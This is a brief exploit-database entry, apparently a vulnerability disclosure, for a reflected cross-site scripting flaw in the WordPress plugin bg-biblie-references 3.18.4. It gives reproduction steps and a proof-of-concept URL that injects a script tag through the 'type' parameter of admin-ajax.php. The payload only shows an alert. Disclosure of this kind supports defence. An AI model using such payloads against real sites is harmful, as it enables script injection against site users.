## https://sploitus.com/exploit?id=WPEX-ID:BBAA808D-47B1-4C70-B157-F8297F627A07
Steps to reproduce:
1. Install the vulnerable plugin (bg-biblie-references 3.18.4)
2. As an unauthenticated or authenticated user, visit the following URL which triggers an alert box:
http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=bg_bibrefs&title=Gen&lang=en&type=x'><script>alert(`xss`)</script>